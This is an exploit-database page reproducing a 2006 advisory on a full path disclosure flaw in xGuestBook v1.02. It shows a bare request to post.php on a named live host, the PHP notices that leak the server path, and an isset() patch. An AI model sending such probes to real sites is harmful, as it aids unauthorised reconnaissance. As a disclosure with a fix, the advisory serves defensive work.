xGuestBook v1.02 Full Path Disclosure
CVE
Category
Price
Severity
N/A
CWE-200
Not specified
High
Author
Risk
Exploitation Type
Date
Not specified
High
Remote
2006-08-03
CVSS vector description
Metric
Value
Metric Description
Value Description
Our sensors found this exploit at: http://cxsecurity.com/ascii/WLB-2006080013 ###################Dicomdk####################
Full Path Disclosure xGuestBook v1.02 #
http://xatrix.xa.funpic.de/xguestbook2/ #
By : X-boy #
##############################################
http://[HOST]/post.php
Test : http://xatrix.xa.funpic.de/xguestbook2/post.php
Result :
========
Notice: Undefined index: user in [site]post.php on line 15
Notice: Undefined index: mail in [site]post.php on line 16
Notice: Undefined index: p in [site]post.php on line 17
Notice: Undefined index: url in [site]post.php on line 19
##############################################
Patch : #
##############################################
-Open post.php
-Find :
$user = HTMLSPECIALCHARS(trim($_POST['user']));
$email = HTMLSPECIALCHARS(trim($_POST['mail']));
$post = nl2br(HTMLSPECIALCHARS($_POST['p']));
$post = str_replace(" "," ",$post);
$url = HTMLSPECIALCHARS(trim($_POST['url']));
$date = date("Y-m-d g:i:s");
-Change to :
if (isset($_POST['user']) AND isset($_POST['mail']) AND isset($_POST['p']) AND isset($_POST['url']))
{
$user = HTMLSPECIALCHARS(trim($_POST['user']));
$email = HTMLSPECIALCHARS(trim($_POST['mail']));
$post = nl2br(HTMLSPECIALCHARS($_POST['p']));
$post = str_replace(" "," ",$post);
$url = HTMLSPECIALCHARS(trim($_POST['url']));
$date = date("Y-m-d g:i:s");
}
##############################################
Copyright ©2024 Exploitalert.
This information is provided for TESTING and LEGAL RESEARCH purposes only.Terms of Use and Privacy Policy and Impressum